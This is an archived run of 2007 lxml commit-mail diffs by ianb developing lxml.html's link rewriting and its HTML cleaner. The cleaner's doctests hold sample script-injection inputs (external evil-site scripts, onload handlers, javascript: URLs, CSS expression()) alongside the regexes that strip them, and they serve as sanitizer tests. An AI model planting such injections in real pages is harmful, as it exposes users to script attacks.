From ianb at codespeak.net Fri Jun 1 06:18:44 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Fri, 1 Jun 2007 06:18:44 +0200 (CEST) Subject: [Lxml-checkins] r43954 - lxml/branch/html/src/lxml Message-ID: <20070601041844.70BB48093@code0.codespeak.net> Author: ianb Date: Fri Jun 1 06:18:43 2007 New Revision: 43954 Modified: lxml/branch/html/src/lxml/doctestcompare.py Log: Change the diff output a bit; only parse if both got *and* want look like HTML/XML Modified: lxml/branch/html/src/lxml/doctestcompare.py ============================================================================== --- lxml/branch/html/src/lxml/doctestcompare.py (original) +++ lxml/branch/html/src/lxml/doctestcompare.py Fri Jun 1 06:18:43 2007 @@ -78,9 +78,11 @@ parser = HTML elif PARSE_XML & optionflags: parser = etree.XML - elif want.strip().lower().startswith('' % tag @@ -297,7 +299,7 @@ if not got: return '' return self.format_text(got, strip) - text = '%s (not %s)' % (got, want) + text = '%s (got: %s)' % (want, got) return self.format_text(text, strip) class LHTMLOutputChecker(LXMLOutputChecker): From ianb at codespeak.net Fri Jun 1 06:25:27 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Fri, 1 Jun 2007 06:25:27 +0200 (CEST) Subject: [Lxml-checkins] r43955 - in lxml/branch/html/src/lxml/html: . 
tests Message-ID: <20070601042527.A7A778093@code0.codespeak.net> Author: ianb Date: Fri Jun 1 06:25:27 2007 New Revision: 43955 Removed: lxml/branch/html/src/lxml/html/rewritelinks.py Modified: lxml/branch/html/src/lxml/html/__init__.py lxml/branch/html/src/lxml/html/tests/test_rewritelinks.txt Log: Move all the link functions directly into __init__; change rewriting to all use iter_links Modified: lxml/branch/html/src/lxml/html/__init__.py ============================================================================== --- lxml/branch/html/src/lxml/html/__init__.py (original) +++ lxml/branch/html/src/lxml/html/__init__.py Fri Jun 1 06:25:27 2007 @@ -1,13 +1,19 @@ import threading import re +import urlparse from lxml import etree +from lxml.html import defs -__all__ = ['HTML', 'tostring', 'Element'] +__all__ = ['HTML', 'tostring', 'Element', 'defs', + 'find_rel_links', 'find_class', 'make_links_absolute', + 'resolve_base_href', 'iter_links', 'rewrite_links'] _rel_links_xpath = etree.XPath("descendant-or-self::a[fn:upper-case(@rel)=$rel]") #_class_xpath = etree.XPath(r"descendant-or-self::*[regexp:match(@class, concat('\b', $class_name, '\b'))]", {'regexp': 'http://exslt.org/regular-expressions'}) _class_xpath = etree.XPath("descendant-or-self::*[contains(concat(' ', normalize-space(@class), ' '), concat(' ', $class_name, ' '))]") _id_xpath = etree.XPath("descendant-or-self::*[@id=$id]") +_css_url_re = re.compile(r'url\((.*?)\)', re.I) +_css_import_re = re.compile(r'@import "(.*?)"') class HtmlMixin(object): @@ -110,8 +116,11 @@ tags in the document are used *and* removed from the document. If it is false then any such tag is ignored. 
""" - from lxml.html.rewritelinks import make_links_absolute - make_links_absolute(self, base_href, resolve_base_href=resolve_base_href) + if resolve_base_href: + self.resolve_base_href() + def link_repl(href): + return urlparse.urljoin(base_href, href) + self.rewrite_links(link_repl) def resolve_base_href(self): """ @@ -119,25 +128,38 @@ values to all links found in the document. Also remove the tag once it has been applied. """ - from lxml.html.rewritelinks import resolve_base_href - resolve_base_href(self) - - def iter_links(self, in_order=True): - """ - Iterate over all the links in the document, yielding - ``(element, attribute, link)``. - - The ``element`` contains the link. ``attribute`` is a string - like ``'href'`` or ``'src'``. It may be None, which means - that the link is in the body of the element. The only type - this occurs is with `` - ... - ... - ... - ... - ... - ... - ...
- ... - ... Hi world! - ...
- ... ''', False)) - link href="style.css" - a href="/test.html" - a href="/other.html" - script src="/js-funcs.js" - img src="/logo.gif" - style None="/bg.gif"@40 - style None="/other-styles.css"@69 - td style="/td-bg.png"@22 From ianb at codespeak.net Fri Jun 1 06:35:35 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Fri, 1 Jun 2007 06:35:35 +0200 (CEST) Subject: [Lxml-checkins] r43956 - lxml/branch/html/src/lxml/html Message-ID: <20070601043535.E300D809C@code0.codespeak.net> Author: ianb Date: Fri Jun 1 06:35:35 2007 New Revision: 43956 Modified: lxml/branch/html/src/lxml/html/__init__.py Log: rename get_text_content to text_content. Add docstring and notes Modified: lxml/branch/html/src/lxml/html/__init__.py ============================================================================== --- lxml/branch/html/src/lxml/html/__init__.py (original) +++ lxml/branch/html/src/lxml/html/__init__.py Fri Jun 1 06:35:35 2007 @@ -1,6 +1,7 @@ import threading import re import urlparse +import copy from lxml import etree from lxml.html import defs @@ -96,7 +97,7 @@ except IndexError: return default - def get_text_content(self): + def text_content(self): """ Return the text content of the tag (and the text in any children). """ @@ -200,6 +201,19 @@ class _MethodFunc(object): + """ + An object that represents a method on an element as a function; + the function takes either an element or an HTML string. It + returns whatever the function normally returns, or if the function + works in-place (and so returns None) it returns a serialized form + of the resulting document. + """ + # FIXME: the None test is a bit sloppy FIXME: this is basically + # functional if you use it with a string; should it be a + # functional equivalent for working with elements too? It has to + # make a copy of the document. The problem is it changes the + # return type, as it should return the copied document and not a + # serialization. Is that odd? 
def __init__(self, name, fragment=False, source_class=HtmlMixin): self.name = name self.fragment = fragment From ianb at codespeak.net Fri Jun 1 06:41:44 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Fri, 1 Jun 2007 06:41:44 +0200 (CEST) Subject: [Lxml-checkins] r43957 - lxml/branch/html/src/lxml/html Message-ID: <20070601044144.31619809F@code0.codespeak.net> Author: ianb Date: Fri Jun 1 06:41:43 2007 New Revision: 43957 Modified: lxml/branch/html/src/lxml/html/__init__.py Log: remove the sub-module function wrappers Modified: lxml/branch/html/src/lxml/html/__init__.py ============================================================================== --- lxml/branch/html/src/lxml/html/__init__.py (original) +++ lxml/branch/html/src/lxml/html/__init__.py Fri Jun 1 06:41:43 2007 @@ -243,29 +243,6 @@ iter_links = _MethodFunc('iter_links') rewrite_links = _MethodFunc('rewrite_links') -class _SubmoduleFunc(object): - def __init__(self, module, name, doc=None): - self.module = module - self.name = name - self.obj = None - if doc is None: - doc = 'See %s.%s' % (module, name) - self.__doc__ = doc - def __call__(self, *args, **kw): - if self.obj is None: - import sys - __import__(self.module) - mod = sys.modules(self.module) - self.obj = getattr(mod, self.name) - self.__doc__ = self.obj.__doc__ - return self.obj(*args, **kw) - -# FIXME: Damn module names conflict with the function names :( -#clean = _SubmoduleFunc('lxml.html.clean', 'clean') -#clean_html = _SubmoduleFunc('lxml.html.clean', 'clean_html') -#htmldiff = _SubmoduleFunc('lxml.html.htmldiff', 'htmldiff') -#html_annotate = _SubmoduleFunc('lxml.html.htmldiff', 'html_annotate') - class HtmlComment(etree.CommentBase, HtmlMixin): pass From ianb at codespeak.net Fri Jun 1 06:41:55 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Fri, 1 Jun 2007 06:41:55 +0200 (CEST) Subject: [Lxml-checkins] r43958 - lxml/branch/html/src/lxml/html/tests Message-ID: <20070601044155.EC494809F@code0.codespeak.net> 
Author: ianb Date: Fri Jun 1 06:41:55 2007 New Revision: 43958 Modified: lxml/branch/html/src/lxml/html/tests/test_rewritelinks.txt Log: remove references to now-gone rewritelinks module Modified: lxml/branch/html/src/lxml/html/tests/test_rewritelinks.txt ============================================================================== --- lxml/branch/html/src/lxml/html/tests/test_rewritelinks.txt (original) +++ lxml/branch/html/src/lxml/html/tests/test_rewritelinks.txt Fri Jun 1 06:41:55 2007 @@ -1,52 +1,13 @@ -These are tests of relocateresponse:: +We'll define a link translation function: - >>> from lxml.html.rewritelinks import Relocator - -In all these examples we'll be using ``http://old`` for the old -(to-be-replaced) URL and ``https://new`` for the new URL (note the -scheme change). To test the rewriting we'll use this handy rewriter -that rewrites everything from one base to another base:: - - >>> relocate_href = Relocator( - ... base_href='http://old/base/path.html', - ... old_href='http://old/', - ... new_href='https://new/') - -Now lets look at simple href rewriting. Normal rewrite:: - - >>> relocate_href('http://old/bar') - 'https://new/bar' - -Note that the trailing / doesn't matter in this one case (since -``http://old`` and ``http://old/`` are entirely equivalent):: - - >>> relocate_href('http://old') - 'https://new/' - -The trailing / does matter in other cases:: - - >>> Relocator( - ... base_href='', - ... old_href='http://old-test/foo/', - ... new_href='https://new', - ... )('http://old-test/foo') - 'http://old-test/foo' - >>> Relocator( - ... base_href='', - ... old_href='http://old-test/foo/', - ... new_href='https://new', - ... 
)('http://old-test/foo/') - 'https://new' - -Rewriting a link that doesn't match old_href is a no-op:: - - >>> relocate_href('http://foo/bar') - 'http://foo/bar' - -Relative links are handled:: - - >>> relocate_href('index.html') - 'https://new/base/index.html' + >>> base_href = 'http://old/base/path.html' + >>> import urlparse + >>> def relocate_href(link): + ... link = urlparse.urljoin(base_href, link) + ... if link.startswith('http://old'): + ... return 'https://new' + link[len('http://old'):] + ... else: + ... return link Now for content. First, to make it easier on us, we need to trim the normalized HTML we get from these functions:: From ianb at codespeak.net Fri Jun 1 06:58:08 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Fri, 1 Jun 2007 06:58:08 +0200 (CEST) Subject: [Lxml-checkins] r43959 - in lxml/branch/html/src/lxml/html: . tests Message-ID: <20070601045808.E8E2C80B0@code0.codespeak.net> Author: ianb Date: Fri Jun 1 06:58:08 2007 New Revision: 43959 Modified: lxml/branch/html/src/lxml/html/__init__.py lxml/branch/html/src/lxml/html/tests/test_basic.txt Log: Fix find_rel_links Modified: lxml/branch/html/src/lxml/html/__init__.py ============================================================================== --- lxml/branch/html/src/lxml/html/__init__.py (original) +++ lxml/branch/html/src/lxml/html/__init__.py Fri Jun 1 06:58:08 2007 @@ -9,7 +9,7 @@ 'find_rel_links', 'find_class', 'make_links_absolute', 'resolve_base_href', 'iter_links', 'rewrite_links'] -_rel_links_xpath = etree.XPath("descendant-or-self::a[fn:upper-case(@rel)=$rel]") +_rel_links_xpath = etree.XPath("descendant-or-self::a[@rel]") #_class_xpath = etree.XPath(r"descendant-or-self::*[regexp:match(@class, concat('\b', $class_name, '\b'))]", {'regexp': 'http://exslt.org/regular-expressions'}) _class_xpath = etree.XPath("descendant-or-self::*[contains(concat(' ', normalize-space(@class), ' '), concat(' ', $class_name, ' '))]") _id_xpath = 
etree.XPath("descendant-or-self::*[@id=$id]") @@ -71,13 +71,15 @@ """ Find any links like ``...``; returns a list of elements. """ - return _rel_links_xpath(self, rel=rel.lower()) + rel = rel.lower() + return [el for el in _rel_links_xpath(self) + if el.attrib['rel'].lower() == rel] def find_class(self, class_name): """ Find any elements with the given class name. """ - return _class_xpath(self, class_name=class_name.lower()) + return _class_xpath(self, class_name=class_name) def get_element_by_id(self, id, default=None): """ Modified: lxml/branch/html/src/lxml/html/tests/test_basic.txt ============================================================================== --- lxml/branch/html/src/lxml/html/tests/test_basic.txt (original) +++ lxml/branch/html/src/lxml/html/tests/test_basic.txt Fri Jun 1 06:58:08 2007 @@ -27,16 +27,14 @@ Also added is a get_rel_links, which you can use to search for links like ````: - >>> h = HTML(''' - ... test 1 - ... - ... item 3 - ... item 4''') - >>> print [e.attrib['href'] for e in h.find_rel_links('tag')] - ['2'] - >>> print [e.attrib['href'] for e in h.find_rel_links('nofollow')] - [] - -FIXME: actually that should have returned ['2', '4'] + >>> h = HTML(''' + ... test 1 + ... + ... item 3 + ... 
item 4''') + >>> print [e.attrib['href'] for e in h.find_rel_links('tag')] + ['2', '4'] + >>> print [e.attrib['href'] for e in h.find_rel_links('nofollow')] + [] From ianb at codespeak.net Fri Jun 1 07:09:12 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Fri, 1 Jun 2007 07:09:12 +0200 (CEST) Subject: [Lxml-checkins] r43960 - lxml/branch/html/src/lxml Message-ID: <20070601050912.E7C5C80A8@code0.codespeak.net> Author: ianb Date: Fri Jun 1 07:09:12 2007 New Revision: 43960 Modified: lxml/branch/html/src/lxml/doctestcompare.py Log: avoid treating a single repr() of an object like markup Modified: lxml/branch/html/src/lxml/doctestcompare.py ============================================================================== --- lxml/branch/html/src/lxml/doctestcompare.py (original) +++ lxml/branch/html/src/lxml/doctestcompare.py Fri Jun 1 07:09:12 2007 @@ -31,6 +31,9 @@ import doctest import cgi +__all__ = ['PARSE_HTML', 'PARSE_XML', 'LXMLOutputChecker', + 'LHTMLOutputChecker', 'install', 'temp_install'] + PARSE_HTML = doctest.register_optionflag('PARSE_HTML') PARSE_XML = doctest.register_optionflag('PARSE_XML') @@ -42,6 +45,9 @@ else: return v.strip() +# We use this to distinguish repr()s from elements: +_repr_re = re.compile(r'^<[^>]+ (at|object) ') + class LXMLOutputChecker(OutputChecker): empty_tags = ( @@ -81,11 +87,16 @@ elif (want.strip().lower().startswith(' Author: ianb Date: Fri Jun 1 07:09:38 2007 New Revision: 43961 Modified: lxml/branch/html/src/lxml/html/tests/test_basic.txt Log: added some more tests for basic functionality Modified: lxml/branch/html/src/lxml/html/tests/test_basic.txt ============================================================================== --- lxml/branch/html/src/lxml/html/tests/test_basic.txt (original) +++ lxml/branch/html/src/lxml/html/tests/test_basic.txt Fri Jun 1 07:09:38 2007 @@ -1,6 +1,6 @@ lxml.html adds a find_class method to elements:: - >>> from lxml.html import HTML, tostring + >>> from lxml.html import HTML, 
tostring, parse_element >>> from lxml.html.clean import clean, clean_html >>> from lxml.html import usedoctest >>> h = HTML(''' @@ -25,7 +25,7 @@ ['P1', 'P2'] Also added is a get_rel_links, which you can use to search for links -like ````: +like ````:: >>> h = HTML(''' ... test 1 @@ -37,4 +37,46 @@ >>> print [e.attrib['href'] for e in h.find_rel_links('nofollow')] [] +Another method is ``get_element_by_id`` that does what it says:: + >>> print tostring(HTML(''' + ...
+ ... stuff + ...
''').get_element_by_id('test')) + stuff + +Or to get the content of an element without the tags, use text_content():: + + >>> el = parse_element(''' + ...
This is a bold link
''') + >>> el.text_content() + 'This is a bold link' + +Or drop both tags (leaving content) or the entire element, like:: + + >>> doc = HTML(''' + ... + ... + ...
+ ... This is a test of stuff. + ...
+ ...
footer
+ ... + ... ''') + >>> doc.get_element_by_id('link').drop_tag() + >>> print tostring(doc) + + +
+ This is a test of stuff. +
+
footer
+ + + >>> doc.get_element_by_id('body').drop_element() + >>> print tostring(doc) + + +
footer
+ + From ianb at codespeak.net Fri Jun 1 07:10:51 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Fri, 1 Jun 2007 07:10:51 +0200 (CEST) Subject: [Lxml-checkins] r43962 - lxml/branch/html/src/lxml/html Message-ID: <20070601051051.EDCF180A8@code0.codespeak.net> Author: ianb Date: Fri Jun 1 07:10:51 2007 New Revision: 43962 Modified: lxml/branch/html/src/lxml/html/clean.py Log: added some more tests for basic functionality Modified: lxml/branch/html/src/lxml/html/clean.py ============================================================================== --- lxml/branch/html/src/lxml/html/clean.py (original) +++ lxml/branch/html/src/lxml/html/clean.py Fri Jun 1 07:10:51 2007 @@ -97,6 +97,10 @@ This modifies the document *in place*. """ + # First, handle a case that IE treats like , and that can + # confuse either this step or later steps. + for el in doc.xpath('descendant-or-self::image'): + el.tag = 'img' kill_tags = [] remove_tags = list(remove_tags or []) if scripts: From ianb at codespeak.net Fri Jun 1 07:12:30 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Fri, 1 Jun 2007 07:12:30 +0200 (CEST) Subject: [Lxml-checkins] r43963 - in lxml/branch/html/src/lxml/html: . tests Message-ID: <20070601051230.F0A0680A8@code0.codespeak.net> Author: ianb Date: Fri Jun 1 07:12:30 2007 New Revision: 43963 Modified: lxml/branch/html/src/lxml/html/clean.py lxml/branch/html/src/lxml/html/tests/test_clean.txt Log: Handle in clean Modified: lxml/branch/html/src/lxml/html/clean.py ============================================================================== --- lxml/branch/html/src/lxml/html/clean.py (original) +++ lxml/branch/html/src/lxml/html/clean.py Fri Jun 1 07:12:30 2007 @@ -11,7 +11,6 @@ # Other on* attributes that aren't standard? # Try these tests: http://feedparser.org/tests/wellformed/sanitize/ # Also http://code.sixapart.com/trac/livejournal/browser/trunk/cgi-bin/cleanhtml.pl -# IE treats like # ...? 
# and is fishy in a fragment # max width for words Modified: lxml/branch/html/src/lxml/html/tests/test_clean.txt ============================================================================== --- lxml/branch/html/src/lxml/html/tests/test_clean.txt (original) +++ lxml/branch/html/src/lxml/html/tests/test_clean.txt Fri Jun 1 07:12:30 2007 @@ -19,6 +19,7 @@ ... </form> ... <blink>annoying EVIL!</blink> ... <a href="evil-site">spam spam SPAM!</a> +... <image src="evil!"> ... </body> ... </html>''' >>> print doc @@ -40,6 +41,7 @@ </form> <blink>annoying EVIL!</blink> <a href="evil-site">spam spam SPAM!</a> + <image src="evil!"> </body> </html> >>> print tostring(HTML(doc)) @@ -61,6 +63,7 @@ </form> <blink>annoying EVIL!</blink> <a href="evil-site">spam spam SPAM!</a> + <image src="evil!"> </body> </html> >>> print clean_html(doc) @@ -76,6 +79,7 @@ Password: <blink>annoying EVIL!</blink> <a href="evil-site">spam spam SPAM!</a> + <img src="evil!"> </body> </html> >>> print clean_html(doc, style=True, links=True, add_nofollow=True) @@ -90,5 +94,6 @@ Password: <blink>annoying EVIL!</blink> <a href="evil-site" rel="nofollow">spam spam SPAM!</a> + <img src="evil!"> </body> </html> From ianb at codespeak.net Fri Jun 1 08:34:17 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Fri, 1 Jun 2007 08:34:17 +0200 (CEST) Subject: [Lxml-checkins] r43967 - lxml/branch/html/src/lxml Message-ID: <20070601063417.C100880A1@code0.codespeak.net> Author: ianb Date: Fri Jun 1 08:34:17 2007 New Revision: 43967 Modified: lxml/branch/html/src/lxml/doctestcompare.py Log: normalize whitespace before comparing text Modified: lxml/branch/html/src/lxml/doctestcompare.py ============================================================================== --- lxml/branch/html/src/lxml/doctestcompare.py (original) +++ lxml/branch/html/src/lxml/doctestcompare.py Fri Jun 1 08:34:17 2007 @@ -45,8 +45,12 @@ else: return v.strip() +def norm_whitespace(v): + return _norm_whitespace_re.sub(' ', v) + # We 
use this to distinguish repr()s from elements: _repr_re = re.compile(r'^<[^>]+ (at|object) ') +_norm_whitespace_re = re.compile(r'[ \t\n][ \t\n]+') class LXMLOutputChecker(OutputChecker): @@ -130,8 +134,8 @@ want = want or '' got = got or '' if strip: - want = want.strip() - got = got.strip() + want = norm_whitespace(want).strip() + got = norm_whitespace(got).strip() want = '^%s$' % re.escape(want) want = want.replace(r'\.\.\.', '.*') if re.search(want, got): From ianb at codespeak.net Fri Jun 1 08:35:35 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Fri, 1 Jun 2007 08:35:35 +0200 (CEST) Subject: [Lxml-checkins] r43968 - in lxml/branch/html/src/lxml/html: . tests Message-ID: <20070601063535.3C58E80A1@code0.codespeak.net> Author: ianb Date: Fri Jun 1 08:35:34 2007 New Revision: 43968 Modified: lxml/branch/html/src/lxml/html/__init__.py lxml/branch/html/src/lxml/html/clean.py lxml/branch/html/src/lxml/html/tests/test_clean.txt Log: Clean using rewrite_links; catch expression() in styles Modified: lxml/branch/html/src/lxml/html/__init__.py ============================================================================== --- lxml/branch/html/src/lxml/html/__init__.py (original) +++ lxml/branch/html/src/lxml/html/__init__.py Fri Jun 1 08:35:34 2007 @@ -178,6 +178,9 @@ If you give ``base_href`` then all links passed to ``link_repl_func()`` will take that into account. + + If the ``link_repl_func`` returns None, the attribute or + tag text will be removed completely. 
""" if base_href is not None: # FIXME: this can be done in one pass with a wrapper @@ -189,6 +192,13 @@ new_link = link_repl_func(link) if new_link == link: continue + if new_link is None: + # Remove the attribute or element content + if attrib is None: + el.text = '' + else: + del el.attrib[attrib] + continue if attrib is None: new = el.text[:pos] + new_link + el.text[pos+len(link):] el.text = new Modified: lxml/branch/html/src/lxml/html/clean.py ============================================================================== --- lxml/branch/html/src/lxml/html/clean.py (original) +++ lxml/branch/html/src/lxml/html/clean.py Fri Jun 1 08:35:34 2007 @@ -1,3 +1,4 @@ +import re from lxml import etree from lxml.html import defs from lxml.html import HTML, tostring @@ -5,9 +6,6 @@ __all__ = ['clean_html', 'clean'] # FIXME: I should study this for more ideas: http://feedparser.org/docs/html-sanitization.html -# In CSS/style attribute: -# url(javascript:...) -# expression(...) # Other on* attributes that aren't standard? # Try these tests: http://feedparser.org/tests/wellformed/sanitize/ # Also http://code.sixapart.com/trac/livejournal/browser/trunk/cgi-bin/cleanhtml.pl @@ -19,6 +17,10 @@ # CSS stuff? # remove images? +# This is an IE-specific construct you can have in a stylesheet to +# run some Javascript: +_css_javascript_re = re.compile( + r'expression\(.*?\)', re.S|re.I) def clean_html(html, **kw): """ @@ -108,14 +110,18 @@ for attrib in defs.event_attrs: for el in doc.xpath('descendant-or-self::*[@%s]' % attrib): del el.attrib[attrib] - for attrib in defs.link_attrs: - # FIXME: should call lower-case() - # FIXME: starts-with isn't really good either, because - # href=" javascript:..." 
is also a problem - for el in doc.xpath("descendant-or-self::*[starts-with(@%s, 'javascript:')]" % attrib): - if isinstance(el, basestring): - assert 0, repr(el) - el.attrib[attrib] = "" + doc.rewrite_links(_remove_javascript, resolve_base_href=False) + if not style: + for el in doc.xpath('descendant-or-self::*[@style]'): + old = el.attrib['style'] + new = _css_javascript_re.sub('', old) + if new != old: + el.attrib['style'] = new + for el in doc.xpath('descendant-or-self::style'): + old = el.text or '' + new = _css_javascript_re.sub('', old) + if new != old: + el.text = new if comments: # Easier way? bad = [] @@ -183,3 +189,9 @@ continue el.attrib['rel'] = 'nofollow' +def _remove_javascript(link): + if link.strip().startswith('javascript:'): + # FIXME: should this be None to delete? + return '' + return link + Modified: lxml/branch/html/src/lxml/html/tests/test_clean.txt ============================================================================== --- lxml/branch/html/src/lxml/html/tests/test_clean.txt (original) +++ lxml/branch/html/src/lxml/html/tests/test_clean.txt Fri Jun 1 08:35:34 2007 @@ -5,6 +5,10 @@ ... <head> ... <script type="text/javascript" src="evil-site"></script> ... <link rel="alternate" type="text/rss" src="evil-rss"> +... <style> +... body {background-image: url(javascript:do_evil)}; +... div {color: expression(evil)}; +... </style> ... </head> ... <body onload="evil_function()"> ... <!-- I am interpreted for EVIL! --> @@ -27,6 +31,10 @@ <head> <script type="text/javascript" src="evil-site"></script> <link rel="alternate" type="text/rss" src="evil-rss"> + <style> + body {background-image: url(javascript:do_evil)}; + div {color: expression(evil)}; + </style> </head> <body onload="evil_function()"> <!-- I am interpreted for EVIL! 
--> @@ -49,6 +57,10 @@ <head> <script type="text/javascript" src="evil-site"></script> <link rel="alternate" type="text/rss" src="evil-rss"> + <style> + body {background-image: url(javascript:do_evil)}; + div {color: expression(evil)}; + </style> </head> <body onload="evil_function()"> <!-- I am interpreted for EVIL! --> @@ -70,6 +82,10 @@ <html> <head> <link rel="alternate" type="text/rss" src="evil-rss"> + <style> + body {background-image: url()}; + div {color: }; + </style> </head> <body> <a href="">a link</a> From ianb at codespeak.net Fri Jun 1 08:39:16 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Fri, 1 Jun 2007 08:39:16 +0200 (CEST) Subject: [Lxml-checkins] r43969 - lxml/branch/html/src/lxml/html Message-ID: <20070601063916.536348077@code0.codespeak.net> Author: ianb Date: Fri Jun 1 08:39:16 2007 New Revision: 43969 Modified: lxml/branch/html/src/lxml/html/clean.py Log: don't delete fieldset and legend. Do remove <layer> Modified: lxml/branch/html/src/lxml/html/clean.py ============================================================================== --- lxml/branch/html/src/lxml/html/clean.py (original) +++ lxml/branch/html/src/lxml/html/clean.py Fri Jun 1 08:39:16 2007 @@ -9,7 +9,6 @@ # Other on* attributes that aren't standard? # Try these tests: http://feedparser.org/tests/wellformed/sanitize/ # Also http://code.sixapart.com/trac/livejournal/browser/trunk/cgi-bin/cleanhtml.pl -# <layer>...? # <head> and <title> is fishy in a fragment # max width for words # max height? @@ -141,13 +140,12 @@ if meta: kill_tags.append('meta') if embedded: - kill_tags.extend(['object', 'embed', 'iframe', 'applet']) + # FIXME: is <layer> really embedded? + kill_tags.extend(['object', 'embed', 'iframe', 'applet', 'layer']) if frames: kill_tags.extend(defs.frame_tags) if forms: - # FIXME: do I even care about fieldset and legend? I don't - # care about label. 
- remove_tags.extend(['form', 'fieldset', 'legend']) + remove_tags.extend(['form']) kill_tags.extend(['button', 'input', 'select', 'textarea']) bad = [] for el in doc.iterdescendants(): From ianb at codespeak.net Fri Jun 1 08:41:26 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Fri, 1 Jun 2007 08:41:26 +0200 (CEST) Subject: [Lxml-checkins] r43970 - lxml/branch/html/src/lxml/html Message-ID: <20070601064126.67BE9809F@code0.codespeak.net> Author: ianb Date: Fri Jun 1 08:41:25 2007 New Revision: 43970 Modified: lxml/branch/html/src/lxml/html/clean.py Log: add page_structure removal; for clean_html parse the html as a fragment Modified: lxml/branch/html/src/lxml/html/clean.py ============================================================================== --- lxml/branch/html/src/lxml/html/clean.py (original) +++ lxml/branch/html/src/lxml/html/clean.py Fri Jun 1 08:41:25 2007 @@ -1,7 +1,7 @@ import re from lxml import etree from lxml.html import defs -from lxml.html import HTML, tostring +from lxml.html import parse_element, tostring __all__ = ['clean_html', 'clean'] @@ -9,7 +9,6 @@ # Other on* attributes that aren't standard? # Try these tests: http://feedparser.org/tests/wellformed/sanitize/ # Also http://code.sixapart.com/trac/livejournal/browser/trunk/cgi-bin/cleanhtml.pl -# <head> and <title> is fishy in a fragment # max width for words # max height? # autolink? @@ -26,7 +25,7 @@ Like clean(), but takes a text input document, and returns a text document. 
""" - doc = HTML(html) + doc = parse_element(html, create_parent=True) clean(doc, **kw) return tostring(doc) @@ -38,6 +37,7 @@ style=False, links=False, meta=False, + page_structure=False, embedded=True, frames=True, forms=True, @@ -69,12 +69,15 @@ ``meta``: Remove any ``<meta>`` tags - ``frames``: - Remove any frame-related tags + ``page_structure``: + Structural parts of a page: ``<head>``, ``<html>``, ``<title>`` ``embedded``: Remove any embedded objects (flash, iframes) + ``frames``: + Remove any frame-related tags + ``forms``: Remove any form tags @@ -139,6 +142,8 @@ kill_tags.append('link') if meta: kill_tags.append('meta') + if page_structure: + remove_tags.extend(['head', 'html', 'title']) if embedded: # FIXME: is <layer> really embedded? kill_tags.extend(['object', 'embed', 'iframe', 'applet', 'layer']) From ianb at codespeak.net Fri Jun 1 20:11:25 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Fri, 1 Jun 2007 20:11:25 +0200 (CEST) Subject: [Lxml-checkins] r43976 - in lxml/branch/html/src/lxml/html: . tests Message-ID: <20070601181125.702FA80A2@code0.codespeak.net> Author: ianb Date: Fri Jun 1 20:11:25 2007 New Revision: 43976 Added: lxml/branch/html/src/lxml/html/tests/test_feedparser_data.py (contents, props changed) lxml/branch/html/src/lxml/html/tests/transform_feedparser_data.py (contents, props changed) Modified: lxml/branch/html/src/lxml/html/__init__.py lxml/branch/html/src/lxml/html/clean.py lxml/branch/html/src/lxml/html/defs.py Log: Added tests from feedparser. Make sure to traverse the root element as well as children (_itertree). Keep contents of some tags like <iframe>. Add filter for <blink>. Add new parser that handles random HTML a bit better. 
Modified: lxml/branch/html/src/lxml/html/__init__.py ============================================================================== --- lxml/branch/html/src/lxml/html/__init__.py (original) +++ lxml/branch/html/src/lxml/html/__init__.py Fri Jun 1 20:11:25 2007 @@ -269,7 +269,7 @@ # FIXME: should this notice a fragment and parse accordingly? value = etree.HTML(html, html_parser) if value is None: - raise ParserError( + raise etree.ParserError( "Could not parse document") return value @@ -283,15 +283,18 @@ of only elements. """ # FIXME: check what happens when you give html with a body, head, etc. - html = '<html><body>%s</body></html>' % html + start = html[:20].lstrip().lower() + if not start.startswith('<html') and not start.startswith('<!doctype'): + # FIXME: That test doesn't work with a doctype or PI + html = '<html><body>%s</body></html>' % html doc = HTML(html) assert doc.tag == 'html' bodies = [e for e in doc if e.tag == 'body'] - assert len(bodies) == 1 + assert len(bodies) == 1, ("too many bodies: %r in %r" % (bodies, html)) body = bodies[0] elements = [] if no_leading_text and body.text and body.text.strip(): - raise ParserError( + raise etree.ParserError( "There is leading text: %r" % body.text) if body.text and body.text.strip(): elements.append(body.text) @@ -313,21 +316,81 @@ if not isinstance(create_parent, basestring): create_parent = 'div' return parse_element('<%s>%s</%s>' % (create_parent, html, create_parent)) + else: + print '----------\n', html elements = parse_elements(html, no_leading_text=True) if not elements: - raise ParserError( + raise etree.ParserError( "No elements found") if len(elements) > 1: - raise ParserError( + raise etree.ParserError( "Multiple elements found (%s)" - % ', '.join([e.tag for e in elements])) + % ', '.join([_element_name(e) for e in elements])) el = elements[0] if el.tail and el.tail.strip(): - raise ParserError( + raise etree.ParserError( "Element followed by text: %r" % el.tail) el.tail = None return el +def 
parse(html): + """ + Parse the html, returning a single element/document. + + This tries to minimally parse the chunk of text, without knowing if it + is a fragment or a document. + """ + start = html[:10].lstrip().lower() + if start.startswith('<html') or start.startswith('<!doctype'): + # Looks like a full HTML document + return HTML(html) + # otherwise, lets parse it out... + doc = HTML(html) + bodies = doc.findall('body') + body = bodies[0] + if len(bodies) > 1: + # Somehow there are multiple bodies, which is bad, but just + # smash them into one body + for other_body in bodies[1:]: + if other_body.text: + if len(body): + body[-1].tail = (body[-1].tail or '') + other_body.text + else: + body.text = (body.text or '') + other_body.text + body.extend(other_body) + # We'll ignore tail + # I guess we are ignoring attributes too + other_body.drop_element() + heads = doc.findall('head') + if heads: + # Well, we have some sort of structure, so lets keep it all + head = heads[0] + if len(heads) > 1: + for other_head in heads[1:]: + head.extend(other_head) + # We don't care about text or tail in a head + other_head.drop_element() + return doc + + if (len(body) == 1 and (not body.text or not body.text.strip()) + and (not body[-1].tail or not body[-1].tail.strip())): + # The body has just one element, so it was probably a single + # element passed in + return body[0] + # Now we have a body which represents a bunch of tags which have the + # content that was passed in. We will create a fake container, which + # is the body tag, except body implies too much structure. 
